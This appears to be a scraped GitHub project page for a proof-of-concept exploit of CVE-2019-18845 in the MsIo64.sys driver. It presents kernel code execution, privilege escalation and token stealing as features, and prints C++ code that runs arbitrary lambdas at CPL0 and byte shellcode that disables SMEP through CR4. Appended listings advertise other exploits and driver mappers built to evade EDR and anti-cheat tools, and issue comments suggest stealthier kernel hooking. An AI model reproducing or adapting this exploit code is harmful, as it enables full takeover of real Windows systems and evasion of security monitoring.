Exploit MsIo vulnerable driver

Overview

MsIoExploit

Exploit MsIo vulnerable driver

Description

This is a PoC for CVE-2019-18845 MsIo64.sys allowing non-privileged user to map/unmap arbitrary physical memory via ZwMapViewOfSection / ZwUnmapViweOfSection. If you are interested in abusing physical memory mapping, see project anycall has full implementation of client and driver-sided functionalities.

Allowing non-privileged(non-kernel) component to map arbitrary physical memory is the most bad practice and critically vulnerable way which allowing attacker to gain full control of the system as I demonstrated arbitrary NT-Kernel API invocation in this PoC.

You can try by yourself by executing this while you have driver running.

Also this driver and MsIo64.dll are fully copy & paste of IO-Memory.

This exploit was first reported 2019 but still remains unfixed and hardware vendors like ASRock still use this driver.

Features

  • Privilege Escalation
  • Shellcode Execution
  • Arbitrary code execution in CPL0 context
    • __writemsr, __cpuid or whatever

I've implemented a replicate of Capcom exploit so you can execute any code in CPL0 context, as follows:

unsigned long long cr4 = 0;
static auto ntoskrnl_image_base = this->ntoskrnl_image_base;
static uint16_t dos_signature = 0x0;

this->disable_smep(&cr4);
// lambda will be called in the CPL0
this->exec_in_kernel([]() -> void
    {
        // direct access to the kernel virtual memory
        dos_signature = *(uint16_t*)(ntoskrnl_image_base);
    });
this->enable_smep(&cr4);

Please note that the lambda function cannot be captured because captured lambda functions cannot be a function pointer. so only static members can access from inside of the lambda. also in the context of CPL0 it is impossible to call a few specific functions like printf will cause BSOD of course.

Shellcode execution will be look like:

void exploit::disable_smep(unsigned long long* old_cr4)
{
    static uint8_t disable_smep_shellcode[] = {
        0xFA,                               // cli
        0x0F, 0x20, 0xE0,                   // mov rax, cr4
        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax
        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff
        0x0F, 0x22, 0xE0,                   // mov cr4, rax
        0xC3 };                             // ret

    this->execute_shellcode_in_kernel<fn_disable_smep_t>(
        reinterpret_cast<uint8_t*>(&disable_smep_shellcode),
        sizeof(disable_smep_shellcode),
        old_cr4);
}

Now we have a full control out of the system, no need to do dumbass thing like mapping unsigned drivers.

Usage

> MsIoExploit.exe

Credit

Several sources regarding token steal are from ExploitCapcom

Credit @tandasat

License

MIT copyright Kento Oki <[email protected]>

You might also like...
x64 Windows kernel driver mapper, inject unsigned driver using anycall
x64 Windows kernel driver mapper, inject unsigned driver using anycall

anymapper x64 Windows kernel driver mapper, inject unsigned driver using anycall This project is WIP. Todo Fix: Can't make API calls from IAT nor func

Driver leap - Self-sustainable fork of SteamVR driver for Leap Motion controller with updated vendor libraries
Driver leap - Self-sustainable fork of SteamVR driver for Leap Motion controller with updated vendor libraries

Driver Leap Self-sustainable fork of SteamVR driver for Leap Motion controller with updated vendor libraries Installation (for users) Install Ultralea

SinMapper - usermode driver mapper that forcefully loads any signed kernel driver
SinMapper - usermode driver mapper that forcefully loads any signed kernel driver

usermode driver mapper that forcefully loads any signed kernel driver (legit cert) with a big enough section (example: .data, .rdata) to map your driver over. the main focus of this project is to prevent modern anti-cheats (BattlEye, EAC) from finding your driver and having the power to hook anything due to being inside of legit memory (signed legit driver).

collection of C/C++ programs that try to get compilers to exploit undefined behavior

------------------------------------------------------------------------------- UB Canaries: A collection of C/C++ programs that detect undefined beh

Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)
Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)

Perfusion On Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012, the registry key of the RpcEptMapper and DnsCache (7/2008R2 only) s

PS1 savegame exploit using THPS3

tonyhax Software backup loader exploit thing for the Sony PlayStation 1. For installing on a memory card, you'd need both the generic tonyhax SPL save

Exploit allowing to load arbitrary code on the PSX using only a memory card (no game needed)

FreePSXBoot Exploit allowing to load arbitrary code on the PSX (i.e. PlayStation 1) using only a memory card (no game needed). In other words, it's a

Dump the memory of a PPL with a userland exploit
Dump the memory of a PPL with a userland exploit

PPLdump This tool implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) - in this blog post - for dumping th

Demo exploit code for CVE-2020-27904, a tfp0 bug.

xattr-oob-swap CVE-2020-27904: a tfp0 bug for macOS 10.15.x and below. Demo exploit code for my talk at BlackHat ASIA 2021. The vulnerability has been

Exploit to SYSTEM for CVE-2021-21551
Exploit to SYSTEM for CVE-2021-21551

CVE-2021-21551 Exploit to SYSTEM for CVE-2021-21551 SpoolPrinter Privesc using SeImpersonatePrivileges was made thanks to

PoC: Exploit 32-bit Thread Snapshot of WOW64 to Take Over $RIP & Inject & Bypass Antivirus HIPS  (HITB 2021)
PoC: Exploit 32-bit Thread Snapshot of WOW64 to Take Over $RIP & Inject & Bypass Antivirus HIPS (HITB 2021)

wowInjector Inject payload to WOW64(Windows 32 on Windows 64) process via exploit 32-bit thread snapshot. This trick makes us possible to do malicious

a reliable C based exploit for CVE-2021-3560.

CVE-2021-3560 a reliable C based exploit for CVE-2021-3560. Summary: Yestreday i stumbled upon this blog post by Kevin Backhouse (discovered this vuln

Exploit allowing you to read registry hives as non-admin on Windows 10 and 11
Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare aka SeriousSam, or now CVE-2021–36934. Exploit allowing you to read any registry hives as non-admin. What is this? An zero day exploit f

This is an exploit for an uninitialized free in nvme:nvme_map_prp()

scavenger This is an exploit for an uninitialized free in nvme:nvme_map_prp(). For more information, see the writeup the slides for the talk in Blackh

Mario Kart 7 semi-primary exploit for the Nintendo 3DS.
Mario Kart 7 semi-primary exploit for the Nintendo 3DS.

kartdlphax kartdlphax is a semiprimary exploit for the download play mode of Mario Kart 7. It can be used to run an userland payload in an unmodified

🎻 Automatic Exploit Generation using symbolic execution

S2E Library This repository contains all the necessary components to build libs2e.so. This shared library is preloaded in QEMU to enable symbolic exec

My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.

CVE-2021-40449 My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. short wu along with the UAF vulnerabilty other

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903
Make CVE-2020-0668 exploit work for version win10 v1903 and version = win10 v1903

CVE-2020-0668 Made CVE-2020-0668 exploit work for version win10 v1903 and version = win10 v1903 Diaghub Exploit ( v1903) powershell exploit works

Exploit for CVE-2021-40449

CVE-2021-40449 More info here: https://kristal-g.github.io/2021/11/05/CVE-2021-40449_POC.html Compiling I did a bit of a hack with the MinHook library

Comments
  • about capcom-like kernel execution stability

    about capcom-like kernel execution stability

    hello, capcom shellcode execution maybe be unstable in some cases so please take look at these links https://twitter.com/artem_i_baranov/status/781910471267983360?s=21 https://github.com/HoShiMin/Kernel-Bridge/blob/master/Kernel-Bridge/API/KernelShells.cpp#L11

    opened by m0rethan3 3
  • improving execution performance and possibly stability

    improving execution performance and possibly stability

    thx for taking attention on my previous issue also you can just look at NtUserCreateWindowStation function kernel implementation for example (or any other that match rule i described next) and you probably notice that actually to hook it you need to swap just one pointer i think that this hook should be PatchGuard free as well cuz pointer resides in .data RW section and to not make multiple syscall calls in usermode e.g. to disable smep or KeSetSystemAffinityThread call you can craft shellcode one time and patch it to function addresses or data that you need to make capcom-like execution faster and physmem loaded driver free

    and also last advice: easy virtual to physical address translation example using physmem vulnerable driver - https://github.com/zx0CF1/physmem_drivers/blob/master/huawei_PoC/phymem.cpp#L66

    opened by m0rethan3 7
Owner
Kento Oki
Kento Oki
How to exploit a vulnerable windows driver. Exploit for AsrDrv104.sys

Exploit and Proof of Concept (PoC) for CVE-2020-15368. Asrock repackaged rweverything driver for their RGB controller configuration tool and signed it. They "protect" it by encrypting their ioctls...lol. We found this CVE by accident last summer, and afaik the driver still isn't patched. The impact is of course arbitrary code execution in kernel, etc. So enjoy this "0day" lol.

Stephen Tong 354 Jan 2, 2023
Hygieia, a vulnerable driver traces scanner written in C++ as an x64 Windows kernel driver.

Hygieia The Greek goddess of health, her name is the source for the word "hygiene". Hygieia is a windows driver that works similarly to how pagewalkr

Deputation 103 Dec 4, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 846 Jan 2, 2023
vdk is a set of utilities used to help with exploitation of a vulnerable driver.

vdk - vulnerable driver kit vdk is a set of utilities used to help with exploitation of a vulnerable driver. There are 2 main features of this library

Pavel 15 Nov 23, 2022
Some hypervisor research notes. There is also a useful exploit template that you can use to verify / falsify any assumptions you may make while auditing code, and for exploit development.

Introduction Over the past few weeks, I've been doing some hypervisor research here and there, with most of my focus being on PCI device emulation cod

Faith 130 Nov 18, 2022
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 157 Jan 2, 2023
A WIP "Vulnerable by Design" kext for iOS/macOS to play & learn *OS kernel exploitation

Vulnerable Kext A WIP (work-in progress) "Vulnerable by Design" kext for iOS/macOS to play/learn with *OS kernel exploitation Usage Documentation can

Chaithu 221 Dec 11, 2022
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration Read: https://www.godeye.club/2021/05/14/0

Kento Oki 160 Dec 30, 2022
libsinsp, libscap, the kernel module driver, and the eBPF driver sources

falcosecurity/libs As per the OSS Libraries Contribution Plan, this repository has been chosen to be the new home for libsinsp, libscap, the kernel mo

Falco 133 Dec 29, 2022
manually map driver for a signed driver memory space

smap manually map driver for a signed driver memory space credits https://github.com/btbd/umap tested system Windows 10 Education 20H2 UEFI installati

ekknod 89 Dec 17, 2022